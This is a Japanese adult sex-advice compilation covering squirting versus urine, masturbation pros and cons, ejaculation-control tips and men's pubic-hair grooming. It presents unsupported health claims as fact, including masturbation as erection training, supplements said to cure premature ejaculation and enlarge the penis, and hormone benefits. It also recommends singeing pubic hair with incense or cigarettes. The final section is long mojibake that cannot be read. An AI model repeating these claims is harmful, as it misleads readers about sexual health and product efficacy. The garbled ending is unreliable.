性の悩み

潮吹きとおしっこの違いって何??答えは〇〇

AVなどでよく見る「潮吹き」。

「潮吹き」のメカニズム、そもそもあの液体は何なのか、気になったことありませんか?

女体の神秘ともいえる「潮吹き」とは何か?

「おしっこ」と何が違うのか、調べてみました!

潮吹きを科学的に考えてみる



まず、潮吹きとは女性がオーガニズムに達する直前、または、セックスの最中にGスポットが刺激されて、尿道から液体が噴き出す現象です。

その様子が、クジラの潮吹きに似ているから、一般的に潮吹きと呼ばれるようになりました。

ちなみ、英語名もあって「Squirting」又は「Female ejaculation」と呼ばれており、直訳すると「女性の射精」となります。

「潮吹き」を体験したことのある女性は4割以下と言われています。

実際に、体験された方の話では、Gスポットが刺激されて、潮吹きしたそうで、Gスポットが潮吹きと何か関係があると言われています。

ちなみに、Gスポットという名前は、Gスポットを発見したドイツの産婦人科医、エルンスト・グレフェンベルグの名前から命名されました。

さて、この「潮吹き」というのは、非常に不思議な現象で、科学的にもまだ解明されていない現象です。

まず、わかっていることは
・尿道から出る
・おしっことは少し成分が違う
・オーガニズムの直前に出る
・挿入だけでは潮を吹かず、Gスポットの刺激が必要になることが多い
この4点です。

① 尿道から出る



まず、潮は尿道から出ます。

モザイクのついた動画ではわかりませんが、インターネットで無修正の動画を探せば確認ができます。

実際に確認をしようとしても、相手がいない、いたとしても経験した女性が4割以下、逆に言えば未経験の女性が6割以上なので、なかなか難しいですよね。

膣から出ると考えた人もいるようですが、あんなに大量の水分が出せるつくりではないので、そのようなことはありません。

② おしっことは少し成分が違う

福岡大学の医学部で潮吹きの研究をされた方がおり、潮吹きの成分は、おしっこよりも汗に近いそうです。
(参照:http://www.news-postseven.com/archives/20140609_260009.html)

出てくる量は、数mlからコップ2杯分まで、人さまざまです。

さらに研究によって、出てくる量によっても成分が違うと言われており、量が少ないと粘りがあり、量が多いとサラサラしています。

色も、量が少ないと白く、量が多いと透明になります。

③ オーガニズムの直前に出る

ここは男性と同じで、性的な興奮がないと潮を吹かず、潮を吹くと、気持ちよくなります。

そのため、おしっこのように、日常的に出ることもありません。ここも、男性と同じです。

④ 挿入だけでは潮を吹かず、Gスポットの刺激が必要になることが多い

ただ挿入をしたり、クリトリスや乳首への刺激だけでは潮は吹かず、Gスポットへの刺激が重要です。

医学的に見てもGスポットの周辺は、女性の前立腺が多くあり、そこへの刺激が何等か関係していると言われています。

潮吹きとおしっこと何が違うの?

では、「おしっこ」と「潮吹き」は何が違うのかというと、潮吹きの成分は汗に近いと言われているので、汗のような液体が尿道から出ていると言われています。

実は、男性の前立腺からでる液体とも成分が似ており、Gスポットが刺激され、女性の前立腺から液体が出てくるのではないかと仮説があります。

しかし、前立腺の大きさから言って、コップ2杯分の量はたまることは考えられず、性的興奮で前立腺液が大量に出てしまい、前立腺で納められなくなり一気に噴き出すと考えられます。

すなわち、潮吹きとおしっこの違いは「膀胱ではなく、前立腺から出た液」、つまり出るところが違うと言えると思います。

しかしながら、潮吹きと同時に失禁しているという説もありますが、量が多いと無職になるので、尿ではないと言われています。

そもそも、潮吹きって何ためのもの?



潮吹きって何のためにあるのでしょうか?

ベッドとかで潮を吹いたら大変と考えてしまいますが、様々な説が唱えられています。

① 尿道を綺麗にする

女性は男性と比べて、尿路感染症にかかることが多いと言われており、セックスが原因でなることも。

そのために、尿道を綺麗にするために、潮を吹くと言われています。

また、潮を吹かなくても、少量の液体が洗浄していると考えられます。

② 精子を殺さないようにする

実は膣の中は強酸性で、射精した精子は膣内で死滅してしまうそうです。

でも、そんなことになったら、子孫は残せませんよね?

そのため、潮によって酸性を薄めると言われています。

ちょっと、量的に多いのではと考えてしまいます。

③ 膣へ挿入をしやすくする

潮吹きはオーガニズムに達しようとしないと出来ません。

そのため、丹念に前戯する必要があり、自然と挿入がしやすくなると言われています。

このような理由がありますが、決定打にかけており、今後の研究する必要があると思います。

潮を吹くために必要なこととは?

おしっこは、必ず出るものですが、潮吹きはそういうものではありません。

でも、女性でも潮吹きを経験したい人は多いと思いますので、コツをいくつか紹介します。

まずは水分を多めにとることです。

水分が少ないと、潮の量が減りますので、勢いよく出したいときは、セックスの前に多めに水分を取りましょう。

また、ビデオでは、はげしくGスポットを指で責めたりしていますが、テクニックがないと、膣を傷つけてしまうので、やさしくGスポットを刺激してあげましょう。

最後に、恥ずかしがらないことです。

潮を吹く直前、尿意とはまた違う、独特の感覚になります。

経験したことのない感覚なので、そこで我慢をしたりして潮を吹かなくなります。

潮を吹くとき、そこにいるのは自分と、最愛の彼の二人だけなので、恥ずかしがらずにその感覚に身を委ねてみましょう。

理想と現実は違う?AVと実際の潮吹きの違いとは?



さて、男性が潮吹きを目にするのは、彼女やあるいは風俗でもなく、AVやネットの動画という方が多いと思います。

よく、あんなに潮を吹くよな…、女優が感じやすいのか、男優のテクニックがすごいのか考えてしまいますが、あれは潮ではなくおしっこだという噂があります。

無色だから、おしっことは違うものじゃないの?

そう思われるかもしれませんが、そもそも潮吹きを何回も出すのが難しいため、水分をたくさん取って、おしっこを出しやすくして撮影していると言われています。

女優さんが吹いている潮は、黄色に色づく前に出ているおしっこなのです。

男性でも経験があると思いますが、飲み会でたくさんお酒(特にビール)を飲んだ時、トイレの回数が多くなりませんか?

その時に、出るおしっこは無色なことが多いです。

たくさん水分を取ると、人間の体は水分を減らすようにできているのですね。

まとめ!

潮吹きとおしっこの違いは、液体が出るところ!でも、まだ研究中

潮もおしっこも尿道から出ますが、成分が違うので、前立腺から出るのが「潮吹き」、膀胱から出るのが「おしっこ」と、現在は考えられています。

なぜ、「考えられている」という表現なのは、現在も研究中だからです。

それくらい、女性の体は神秘にあふれているのですね。

医学的に解明出来たら、ノーベル賞も狙えるかも?最愛のパートナーと一緒に、潮吹きの解明に挑んでみてはいかがでしょうか?

【知ってる!?】オナニーのメリット、デメリット

皆さんはオナニーしてますか?

皆さんがするオナニーなんですが、メリット、デメリットがあるんです。

オナニーってデメリット多そう…。
と思っていらっしゃる方も多いでしょうが、実際のところははそんなこともないんです!

皆さんもこの記事を読んで、正しいオナニーライフを満喫しましょう!

【オナニーのメリット】

セックスのトレーニングになる


男女ともオナニーをすることは、セックスのトレーニングになります。
自分が理想とする相手や体位、シチュエーションを想像しながらのオナニーは、実際にセックスをするときにとても役に立ってきます。

ポイントは想像してオナニーをするということ。理想としてはオカズを妄想力に任せるということです。

しかし、今の世の中は便利なもので、ネット検索でエロ動画と検索すればたくさんのアダルト動画が出てくる便利な時代です。
そんな時代の便利化によりオナニーの質はどんどん下がっています!
エロ動画に頼らずに妄想力でオナニーが出来るようになると、実際のセックスのときに効果が発揮できると思います。

勃起力を高める効果がある

本番のとき、いざ挿入しようと思ったら息子が言うことを聞いてくれない、そんな状況男としては辛いですよね。

それは陰茎の筋力低下が原因、つまりチントレを行っていくことが大切です。
そのチントレというのが、オナニーなのです。

下の方の筋トレは無理だと思っている方も多いでしょうが、もちろん鍛えることは出来ます。

日々のオナニーが勃起力の強化に繋がるのです。

早漏防止になる


オナニーをすることによって、早くイッてしまうという状況を変えることが出来ます。

そのためには毎日のオナニー15分以上かけて行うことが大切です。
気持ちいいからといって、2〜3分で終わるオナニーを行っていては意味がありません。

じっくりと時間をかけてオナニーをすることが大切です。
早漏が治れば、相手も自分も嬉しいものです。

ストレス解消になる

オナニーをすると気持ちいいですよね?
実はオナニーという行動自体がストレスを軽減する効果があるのです。
オナニーをすると大量のアドレナリンが分出され、脳内の興奮状態はMAXになります。
皆さんもストレスが溜まったら、すぐにシコシコして大丈夫です。

女性のオナニーは性感帯を強くし、感じやすくイキやすい体にする


女性でSEXを気持ちよくないと感じている人は多いようで、男性の勝手な愛撫や挿入が、そう感じる原因のひとつです。

そこで、女性は1人でオナニーをすることにより、自分の性感帯を刺激し、気持ちいい場所を開発することが出来るのです。

自分でオナニーを行い、それをパートナーに伝えることで今までより深く、質のいいセックスが期待できます。

女性ホルモンの活発化により、より女らしい身体になる

女性はオナニーをすることで女性ホルモンが活発になります。
よって若々しく、綺麗な肌を手に入れることができます。
また、月経などによる精神状態の安定化も挑めます。

オナニーをすることで、意識する異性を惹き付けられる効果が期待できそうです。

【オナニーのデメリット】

疲労が溜まる


オナニーをすることで、リラックス効果やストレス解消と引き換えに疲労が蓄積していきます。

オナニーをした次の日の朝に身体がだるい…
なんて経験をした方も多いと思います。

オナニーは思っているほか、体力を消耗してしまうのです。

間違ったオナニーをすることで、セックスの際にイカなくなる

これは男女ともに共通して言えることですが、間違ったオナニーをすると、イキにくい体質になってしまうのです。

男性であれば、オナホールなどの自慰行為用玩具の使いすぎや、床オナ(床に陰茎を擦り付けて行う自慰行為)などにより、膣内射精障害を引き起こしてしまう可能性があります。
また、手を清潔にしていなかったために、ばい菌に感染し、尿道炎などの病気を引き起こす可能性があります。

女性であれば、バイブやローターなどの玩具の使いすぎにより、逆にイキにくい身体になってしまいます。
また、女性も男性と同じく清潔にしていないと膣内炎を起こす可能性があります。

男性ホルモンが活発化され、ニキビや肌荒れの原因となる


男性はオナニーをすることによって、男性ホルモンの働きが高まり、ニキビや肌荒れになりやすくなります。

精液のほとんどはタンパク質で出来ています。
オナニーを行う際は、しっかりとタンパク質を補給してから行ったほうがいいかもしれません。

【番外編】

オナ禁をするとモテる!?


皆さんはオナ禁をするとモテると言うことを聞いたことはありませんか?
男性の方であれば、1度は聞いたことがあると思います。

本当にオナ禁をするとモテるのでしょうか?
オナニーをするとテストステロンという男性ホルモンが抑制されます。
このテストステロンというホルモンは、いわゆるモテる男性ホルモンであり、それが軽減すると言われています。
結果、モテなくなるとされていますが、果たしてどうなのでしょうか?

実は科学的根拠がないのです。
あなたの周りのモテる人はオナニーをしていないのでしょうか?
いいえ、必ずしているはずです。
よって、モテるモテないにあまりオナニーは関係ないと言われています。
むしろ、思春期の男子であればオナニーを行うこと自体が健全な行為なのです。

また、オナ禁によってスポーツの成績が上がるというのもデタラメな嘘です。
スポーツの成績はオナニーなんかよりも、日々の努力と負けない気持ちに比例します。

【まとめ】

皆さんが思っている以上にオナニーはメリットが多いのです。
自分で悪いイメージを持ち、オナニーをしないことでストレスを溜めるよりも、たくさんシコシコして発散してみましょう。
ただし、間違ったオナニーをしてはいけません。
知識をしっかりと身につけ、正しくオナニーを楽しみましょう。

【ふにゃちんさよなら!】勃起したまま射精をコントロールする10個の方法

セックス中にどうしても射精を我慢することが出来ず、自分だけ先にイってしまい、その度に彼女や妻から不満な顔をされて、自分が情けなくなってしまい自信がなくなってしまうことが、1度は経験があるかと思います。

そこで、どのようにすれば射精をコントロールすることが出来るのか、10個の方法を紹介したいと思います。

射精コントロールを学ぶ



程度に差はありますが、早くイクのも遅くイクのも女性から嫌われてしまいます。

射精の癖を改善するのは難しいですが、「個人差があるんだから仕方ない」と開き直り、一人よがりなセックスを続けてしまうと、彼女や妻から本当に嫌われてしまうかもしれません。

セックスは、男女間のとても重要なコミュニケーションですので、射精コントロールの方法を学んで実践すれば、彼女や妻と一緒にオーガズムを迎えることが出来たり、関係をもっと良くすることが出来たりするかもしれません。

セックスに集中しすぎないようにする



例えば女性の気持ち良さそうな表情や感じているときの息遣い、喘ぎ声は全て日常生活では見ることが出来ない姿なので、それだけで男性は興奮します。

そうでなくても膣にぺニスを挿入して気持ちよく刺激されているのに女性のエロイ姿を見てしまうと、脳がどんどん興奮して射精を我慢できなくなりますので、あえてセックスに集中しないで、セックスの最中に彼女の方を見ていても、頭の中では別のことを考えるようにしてください。

例えばですが、明日の仕事のことやテレビ番組の内容を思い出してみたり、帰宅途中で見たおじさんのことを思い浮かべたりして、ぺニスが萎えない程度に興奮を抑えてください。

ですが、射精は精子を出してしまう10秒前から始まっていると言われていますので、自分が「イキそう」と思った時には遅すぎますから、ぺニスを挿入したらすぐに気を散らしながら腰を動かすようにしてください。

膣に挿入したら動かないようにする

早くイってしまうことで悩んでいる男性は、女性を愛撫する時間が極端に短すぎて、女性のイク準備がととのっていない等があります。

愛撫は運動でいう準備体操と一緒で、体をほぐして怪我を防ぐのと同じで、イキやすくなるように体をほぐし脳を興奮させてあげないと、女性はなかなかイケません。

女性が先にイケば射精をコントロールする必要はなくなりますので、愛撫をいつもより長めにしてください。

膣にぺニスを挿入したらとにかく、激しく腰を動かすのは間違いで激しく腰を動かすのは、女性がイキそうになってからです。

それまではスローテンポでぺニスを膣に挿入したら、10分くらい動かないでキスや愛撫をすると、女性は焦らされて感度が高まることによって、あなたが少し動いただけで女性はイってしまうかもしれません。

腰を動かすときもゆっくりし、女性の膣壁を擦って快感を与え、自分がイキそうになる前に動きを止めて気持ちを落ち着かせることによって、いつもよりも長く射精を我慢することが出来ます。

ぺニスを刺激に慣れさせること



オナホールを使って、ぺニスを刺激に慣れさせ射精しづらい体にすることが出来ます。

オナホールは、女性の膣以上の快感を与えてくれる男性用のオナニーグッズで、締め付けが強すぎるオナホールだと挿入した瞬間にイってしまいますので、まずは緩いものから始めてください。

オナホールを使うときは、ゴムがぺニスの皮や亀頭を擦って痛くなりますので、ローションをつけて本番と同じようにコンドームをつけてしてください。

オナニーをしていると、そのうちにイキそうになってきますので、そのタイミングを覚えてイキそうになる前に手を止めて、射精を我慢するトレーニングをすることによって、イキづらくすることが出来ます。

ただし、このトレーニングはやり過ぎると、遅くイってしまう可能性がありますので、くれぐれもやり過ぎには注意してください。

骨盤底筋群を鍛えること

射精をするときに使われる骨盤底筋群を鍛えることによって、射精を我慢することが出来ますが、例えば男性ならおしっこを我慢しているときのことを思い出すと、肛門近くの筋肉をきゅっと締めますがその部分が、骨盤底筋群です。

おしっこの時と同様に、射精の時も骨盤底筋群を締めることで僅かな時間ですが、射精を我慢することが出来ますし、勃起力も向上します。

骨盤底筋群を鍛えるのは座りながらでも出来、まずは肛門をきゅっと締めてその状態を5秒間維持し、次に力を抜いて5秒間維持するのを繰り返すだけで、仕事の合間や就寝前に行うと一番効果的です。

射精しにくい体位に切り替えること



実は射精しづらい、深い挿入や激しいピストンが出来ない体位がいくつかあり、もう少し続けたいけどイってしまいそうというときは、射精しにくい体位に切り替えてください。

射精を我慢しやすい体位として代表的なのは側位で、深い挿入や激しいピストンが出来ないことから、射精がしにくい体位と言われています。

男性が動きにくい体位なので、女性に物足りないと思われてしまうかもしれないので、必ずキスを入念にして物足りなさを補ってください。

また対面座位も射精しにくい体位で、椅子などに座ると射精時に必要な筋肉の緊張がなく、射精しにくいので小休憩するための体位として有効です。

呼吸法を試してみる

実は勃起して射精するときには、興奮を促す交感神経が活発になっていますので、呼気を長くするだけで、体をリラックスさせるための副交感神経が活発になり、抑制することが出来ます。

鼻から吸って口からゆっくり吐くのを、1分ほど繰り返し特にピストン運動を緩めなくても、イキそうな感覚が収まってくるはずです。

おでこを手のひらで押さえること



これも非常にシンプルなのですが、副交感神経がおでこを手のひらで押さえることによって、活性化するために射精のコントロールにつながりますが、セックス中にいきなりおでこを押さえると、女性から「どうしたの?」と疑問が生まれますので、バックなど女性からは見えない体位の時にするようにしてください。

先程の長く息を吐くのと一緒に行うのが効果的です。

連続ですること

我慢できなければ射精して、すぐにするというのもいいかもしれません。

一回出したら終わりの風俗では出来ませんが、愛するパートナーとのセックスなら、「2回もしてくれた」と彼女は喜んでくれます。

初めての相手なら早いとビックリしてしまうかもしれませんが、「膣の中があまりにも気持ちよくて我慢できなかったから、もう一回しよう?」と誘ってあげれば一番の誉め言葉になります。

一回だしてしまうと眠くなってしまう人は、セックスをする少し前に自分でオナニーをしておくことによって、感覚が鈍くなるので射精コントロールをしやすくなります。

サプリメントや勃起薬を活用してみること



セックス中の工夫や普段の生活改善からも射精をコントロールすることは可能ですが、サプリメントのほうが高い効果が期待できます。

少々値段はしますがライゼックスというものや、テンザーゴールドなどのサプリメントが、早く射精してしまうことや勃起力を改善することが出来ます。

どちらも数ヶ月飲むことでぺニスのサイズ自体の巨大化も出来るそうです。

病院で包茎の治療をすること

早くイってしまう、遅くイってしまうことで悩んでいる人の中には、包茎であることが原因かもしれません。

例えば包茎性早漏は包茎であることにより、常に亀頭が皮をかぶった状態なので、セックスするとなると亀頭への刺激が強すぎてすぐにイってしまいます。

また常に包皮で包まれている亀頭が敏感になりすぎて、挿入では痛みを感じてしまい遅くイってしまいますが、亀頭への刺激に慣れることが出来れば改善する可能性が高いです。

亀頭を露出させてオナニーを繰り返すことによって、徐々にですが亀頭への刺激に慣れて、射精までの時間を伸ばすことが出来ますが、勃起しても皮が剥けない真性包茎、カントン包茎の場合はセックスでも亀頭が露出しないので、刺激が弱くなり遅くイってしまいます。

こうした状態で悩んでいるなら、包茎治療の専門家の所に行き、手術するしないは別にして正しい射精の方法について助言をもらえるはずですが、今後楽しいセックスをするためにも包茎はしっかりと治しておくことをおすすめします。

まとめ

勃起したまま射精をコントロールする方法を10個紹介してきましたが、ぜひセックスの時には自分も彼女や妻も楽しめるように試してみてください。

他にも亀頭を麻痺させるスプレーなんかもありますので、どうしても早くイってしまうのが改善出来ないようであれば、使用してみてください。

【手入れは必須!】女に好かれるアンダーヘアを作るコツ

一般的にアンダーヘア…(下の毛ですね///)をお手入れするのは女性が主だったのですが、ここ10年は男性も、入念に手入れをするようになりました。

ヘアセットして、スタイルやアレンジを楽しむように、アンダーヘアのお手入れも、男性の中で日常化しつつあるのです!

え…まだやったことない……』、『どの辺をどんな風に手入れしたら良いかわからない』、『手入れしたらチクチクして肌荒れしちゃった』など、そういった皆さんのために、今回はそのアンダーヘアの手入れの仕方…それも女性に好感を持たれる処理の方法をお話したいと思います。

アンダーヘアのお手入れによるメリット


1.陰茎(サオ)が大きく見える!

2.清潔感がある。

3.衛生的である。

4.陰茎に毛が絡んで引っ張られることが無くなる。

5.蒸れて気持ち悪くならない。

6.汗による匂いが少なくなる。

などメリットが多く見られ、何より女性に見られる場面においても、伸ばしっぱなしの状態よりも遥かに好感触です。

お手入れの際の注意

男性の場合、剃毛、脱毛などただ闇雲にお手入れすれば良いわけではなく、そこには自然な男性らしさも残しておかなければならないのです。

また、使用する器具や薬剤にも注意が必要で、間違ったものを使用してしまうと、あなただけではなく、相手の女性にまで被害が及ぶのです。

お手入れのやり過ぎ、行き過ぎ



男性の場合、女性のように陰毛でキッチリ形を作って、その周りを完全剃毛ないし脱毛してしまうと、それを見た女性に逆に引かれてしまう傾向があります。

あくまで自然なスタイルを脱しない程度にお手入れする事が大事なわけで、やり過ぎは良くありません。

女性にとって、自分より、または気持ち悪い位綺麗な男性の陰毛のお手入れは、逆に好感を持てず、テンションが落ちます。

やり過ぎは逆に女性が萎えてしまうんです…はい。

カミソリ、T字を使った剃毛

これらを使うと、例え深剃りであろうとヒゲと同じで、剃った直後は良いのですが、問題なのは生えてきた時。

経験がある方もいらっしゃるかと思うのですが、チクチクしてこれがまたかゆい!!(笑)

基本的に刃物で切った毛の切り口は鋭利なものになるから、その毛先が肌やサオに擦れた時の痒さたるや……思わずちんちんカイカイしたくなりますね(苦笑)

更に女性とのSEXの際、フェラしてもらう時、挿入した時に接した部分が、相手の女性に半端ない痒さと不快感、時には痛みさえ与えてしまいます!

なので剃毛する際は、完全に剃り残しなしの深剃りする事を前提に、終わったあとは、化粧水や乳液などで乾燥を防ぐため、ちゃんと保水することをおすすめします。

脱色剤を使わない



そのまま剃らずのお手入れ、色くらい抜くか?ってな軽い気持ちで脱色を試みたり…あると思います(笑)

脱色剤は刺激も強く、あの刺激的な鼻を突く匂いも数日残る上、亀頭(カリ)部分のように粘膜が薄い部分に、炎症を起こしかねない陰部に使うのはおすすめできません。

上の毛は黒々としてるのに下は金髪……笑えませんが、上下で金髪で合わせる……眉毛は?腕の毛は?もぉ言い始めたらキリがありません(笑)ので、あまりアンバランスなスタイルはおすすめ出来ませんね(汗)

正しいお手入れ方法

男性には、陰毛の自然な形の逆三角形『Vライン』、アナル付近の『Oライン』があり、それぞれの部位の毛を手入れにより綺麗に、場合によってはサッパリして行きます(笑)

ただし、部位により使用するツールに相性もありますので、それらも含めてご紹介しますね。

まずは脱毛スタイルについて



※図は女性用ベースなので、一番底辺が陰茎(サオ)だと思ってください。

男性が目指す理想の形はナチュラル(へそ下から繋がる毛、太ももの辺りを剃毛、脱毛する以外は触れない)、よくやってトライアングル辺りで済ませるのが無難、その他にチャレンジしてしまうと、後々後悔してしまうかも知れませんので、そこは自己責任で(笑)

へそ下の毛(昭和で言うギャランドゥ!死語です(爆))は、お相手の女性が望まない限り、またはあなたにポリシーがない限りは、無い方が良いかも。

ヒートカッターを使う

剃毛するアイテムではなく、毛を途中でカットするもので、刃先が熱線状態のカッターで、熱で焼き切る技法をとることで、切り口を丸くすることができ、肌に触れてもチクチクしません。

家電量販店、通販で¥2,000~¥5,000ほどで購入出来るので、お手入れを日常化したい方にはおすすめです。

自然な形、毛並を残すため、生え際から2~3cmを目処にカットしますが、刃先がめっちゃ熱いので火傷に注意ですよ!?

ハサミでカット+線香、煙草で焼く



陰毛全体の毛を、生え際2~3cmより、気持ち長めにカットします。

また、それぞれの毛の長さをランダムにする為に、指で毛を1束摘んだら、ネジってもらい、そこをハサミで切ると、長さが均等にならず、自然に仕上がります。

ただハサミの場合切り口が鋭利になるので、少し面倒ですが、毛先を線香または煙草で焼くことで毛先を丸くし、肌に触れてもチクチクしないようにケアすることができます。

長く残しすぎたとしても、短く焼いてしまえばいいので、ある意味思い通りのスタイリングができますよね?

抜く!

不要な部分は全て抜く!もちろんこの方法ならば生え際がチクチクする事なんてありません!!

それに必要なものは毛抜きと根性だけ!(爆)

とはいえかなりの根気と痛みに耐える根性が必要で、1本1本終わるまで痛みが続くわけです……私にはとても我慢できそうにありません……。

ブラジリアンワックス



現在トップクラスの人気を誇るブラジリアンワックスなのですが、これは加熱して溶かす必要のない、誰でも簡単に使用できるスグレモノで、脱毛したい部分に粘度のあるワックスを塗り、上から専用のワックスペーパーを貼り、しばらく放置します。

時間を置いたら……もうおわかりですね?そう!一気に『べリッ!!!』……っとひと思いに剥いでやります。

毛抜きより痛みは一瞬、しかし個人差はありますが、なっかなか痛いのですが、剃るわけではないので、伸びてくるまでのスパンが長いのは少し魅力的なのかも知れませんし、生えてきた時も、剃ったあとのそれほどチクチクする訳ではありません。

『ブラジリアンワックス公式』

除毛クリームを使う

現在剃毛の際おすすめなのは、『NULLリムーバークリーム』で、刺激も少なく、剛毛でも大丈夫なんです。

皮脂や汚れを落とし、乾いた除毛したい部分に毛を覆うように集めにクリームを塗り、5~10分放置したあと、タオルなどで拭き取り、水で流すだけ。

これで綺麗サッパリ!毛の必要のない部分には手軽で素早く処理できますし、変な匂いも残りませんし低刺激なので、除毛を簡単に行うには良いアイテムだと思います。

『NULLリムーバークリーム公式』

メンズサロン、クリニックによる脱毛



使い分けが大切で、完全に毛がない状態で維持したい場所は、多少の時間とお金が掛かったとしても、脱毛する事をおすすめします。(除毛に対して日々の手間が苦にならなければ別ですが…)

特にOライン(アナル付近の毛)ですが、デリケートであり、皮膚も薄く、それでいて見えづらい部分なので、ここは完全に永久脱毛してしまうのが得策かと思います。

ここに毛はいるのか!?』…はい、わかります…(笑)

もしそれほどまで考えていないのであれば、抜くのは難しいので、カミソリやT字になるのですが、くれぐれも切らないようにお手入れして頂き、綺麗に剃毛出来たら乳液や保湿クリームでしっかりアフターケアしてください。

アナル付近が痒くなるの……嫌ですよね?(爆)

まとめ

男性は女性、女性は男性にと、それぞれが異性のためにどれほど努力しているのかがわかる内容なのですが、『まだそんな機会もチャンスないから…』とか言ってるとイキナリ来るんですよっ!?その機会やチャンスが!(笑)

いつなん時、何があってもいいように!…最初はもしかすると自己満足なのかもしれないけど…もちろんここだけちゃんとすれば言い訳じゃないですけどね?

日々自分のルックスに磨きを掛け、異性を意識しつつ、服装、スタイル、ヘアスタイル、トドメにココ?って感じで考えて頂けたらと思います。

どの部分でも同じことが言えると思うのですが、仕事も趣味もお洒落も、緩やかで構わないので日々継続が大事なんだと思いますよ?

e??a��a?�a��a�?a?�e?�a��a?�i??a??c?�a�?c��a�?a??a??a??a��a??a��7a?�a?�????�?c�?

a?�a�?a?�a��?�?a??e??a��a��a�?a??a?�e�?a?�a?�e��?��a�?cY�?��a��a??a??a??a�Sa??c?�e�?a?�a��a??a?�a?�a?�a??a��a��a�????a?�?Z?a?�a?�e�?a�?a?�e??a?�a?�a???�?a?�a??a?�a��a?�a?Ya??a??a?�a�?a?�e�?a?�a?�a?�a??a��a�?e�?cs�a?�a??a��a??a��a??a?�a?�a?�a??e�?e�?a?�a??a��a???�?a?�a??a?�a��
a�?e�?cs�a?�a�?a�?a�?a??a?�a?�a�?a�?a?�a��e�?a?�a?�a?�a?�a�?a?�a��
a�Yes�a?�a�?a?�e�?a?�a?�e��?��a�?cY�?��a��e?za?�a�?a?�e��a��a??a�?a��a??c��a??a?�e?�a??a?�a?�a??a?�a?�a?�a??a??a?�a?�a?�a��a?�a?�i?Y
a?�a�?a��?�Ya?sa?�e�?a?�?Z?a?�a??a?�a?�e?�a��a?�e��a?�a?�a��a?�a?�a?�a?�a??a??a?�a?�a??a???�?a?�a??a?�a��

e�?a?�a?�e��?��a�?cY�?��a��a??a??a??a�Sa?�a?�a�?a?�a�?a�?a�?c�?a��

a��e��a?�a��?�?a??a??a?�a?Ya??a�?a?�e�?a?�a?�e��?��a�?cY�?��a��a??a??a??a�Sc?�e�?a?�a��a??a?�a?�a?�a??e�?e�?a?�a?�a��
a??a??a??a��a�?e��?��a�?cY�?��a��a??a??a??a�Sc?�e�?a?�a?�a?�a??a?�a??e�?a?�a??a???��a?�a??a?�a��a?Ya�?a?�a?�a��a?�a?�e??a?�a?�e�?a?�a?�e��e?�a??a?�a?�a??a?�a?�a??c�Ya??a��a?�a��a?�a?�a��
a?�a??a?�a�?e�?a??a��a??a��a???s�a?�e�?a??a?�a?�c?Zc�?a��c��??�a?�a?�aS?aS�a?�a?Ya�Sa�?a��a?�a��a??e��a?�a?�a��e��e�?a??a?�a?�e��e�?a?�a?�e��e�?a?�?Y�a�?a?Ya�Sc��a�?a?�e�?a?�a?�e��?��a��??�a?�a?�a�?a�Sa?�?�?e??a?�?�?a?�a�?a?�a?�a??a?�a?�a??e��a?�a??a?�a?�a??a?�a?�a��a?�a?�a��

e�?a?�a?�e��?��a�?cY�?��a��a??a??a??a�Sa?�a?�a�?a?�a�?a��e??c�?a��

a?�a??a�?a��e��a?�e��?��a�?cY�?��a��a??a??a??a�Sa?�a?�a?Ya��a�??�?a??a��e??a?�e��?��a�?cY�?��a��a??a??a??a�Sa?�a?�a??a?�a��a?�a��

c�?a??a?�c�?a?�a??a?�a??a�??��?�?a?�e�?a?�?�?a?�a?�a?�a��
a?�a??a��a��e��a?�?��a��e�?a??a?�a��a��a??a�Sa??e��a?�e?�a??a��a?�a?�a?�a��

c��?��a?�a??a?�a�?e��a?Yc��a??a?�a�?a??a?�a��a�?a??a???��a??a?Sa�?a??a??a?�a?�a��a?�a??a?�a??a??a?Ya??a?�a?�a��a�??��?�?a??a?�a?�a??a??a��a?za?za?Sa�??�?a?�a??a?Ya�Sa�?a?�a?�a??a?�a?�a��a?�a??a�?e?Za?Za��a?�a??a?�a??a??a???�?c�?a�?a??a?�a?�?�?a?�a?�a?�a?�a�?a?�(c��)
a��a?�cs�a?�a?�a��a?�a�?a?�e�?a?�a?�a??c�?a?�a??a?�a??a�?a�?a�?a?�a��a?�a�Sa??a?�a��a��

a??a?�a?�a??a�?a?�a??a�?i?Ya�?a??a?�?�Ya??a?�a?�a??a�?a�Yes�a?�e�?a?�a?�?��?�?a��a?�a???�?a?�a?�c�?c?�a?�c�??��a?�a???��a?�a??a�?a?�a?�a�?a??a??a??a?�a?�a?�a��a�?a��a�?a?�a��a?????a?�a??a?�a?S?��a??a?�a??a�?a??a??a�sa?�a?�a��a?�a�?a??a?�a��a??a�?a?�a?�a��a??a?�a?�e��a��a??a?�a��a?�a��a???��a?�a??a�?a?�a?�a�?a??a??a?�a?�a?�c�?a�?a?�a?�a??a?�a�?a??a?�a�?a??a?Ya??a??a?�a?�a??a?�a?�a?�a��a?�a��

a??a?�a??a��a??a??a?�a?�a??a?Y?�Y??�a?�e��a�??��a??e�?a?sa??c�??��a?�a???��a?�a??a�?a??a?�a?�a??a?�a�?c�?a��??�c��cs�a?�a??a�?a��a??a?�a?�e???Sza��a??a??a?�a?�a??a?�a?�a�?a??a??a??a�sa?�a�?a?�a?�a?�a��

a??a?�a?�a�?c�?c?�a?�c�??��a?�a??a�?a?�a?�e�?a?�a��a��a??a��a?�a?�a??a??a??a�?a?�a�Sa?�a??a??a?�e�?a?�a?�e�?a?�a??a?�a�?a�??�?a?�a??a?�a�?a��cY?a??a?�a��a��a?�a�?a�sa?�a?�e�?a?�a��c�??��a��cY?a��aS?aS�a��a?�a��a?�e�?a??a?�a�Sa??a?�a��

c�??��a?�a?�a��cY?a��

e�?a?�a?�a?�a��a��e??a�?a��e??a?�e��?��a??cY�?��a��c?�e�?a?�a?Ya��?�?a??c�??��a?�a?�a?�a?�cY?a??a?�a?�a??aS?aS�a��a?�a??a?�a�?a?�a??a�Sa??a?�a��a��

c?�e�?a?�a��a??e?�a??a?�a��a�?a??a??a��a??a??a??a?�a?�a?�a��a�?cS?c??a?�?��a��?Y�a�?a��a�?a?�a??a?�a??a??a?�a??a?�a?�a??a?�a?�a?�a?�i??
a?�a??a??a?�a��a�?c�??��a?�a???��a?�a?�a?�a?�a�?a?�a?�a�?a?�a??a?�a?�a�?a?�a?�a?�a�?a?�a?�a�?a?�a??a?�a?�e??a�?a��???a?�a?�a?�a�?a??a?�c?�a?�a?�a?�a??a��a?�a??cY?a??a?�a?Sa?�a??a?�a??a�?c�??��a?�a???��a??a?se��a��a??a??a??a��a??a?�a�?a�?a??a??a?�a�?a�?a?�a�?e??a??a??a??a?�a?�a??a?�a??a?�a��

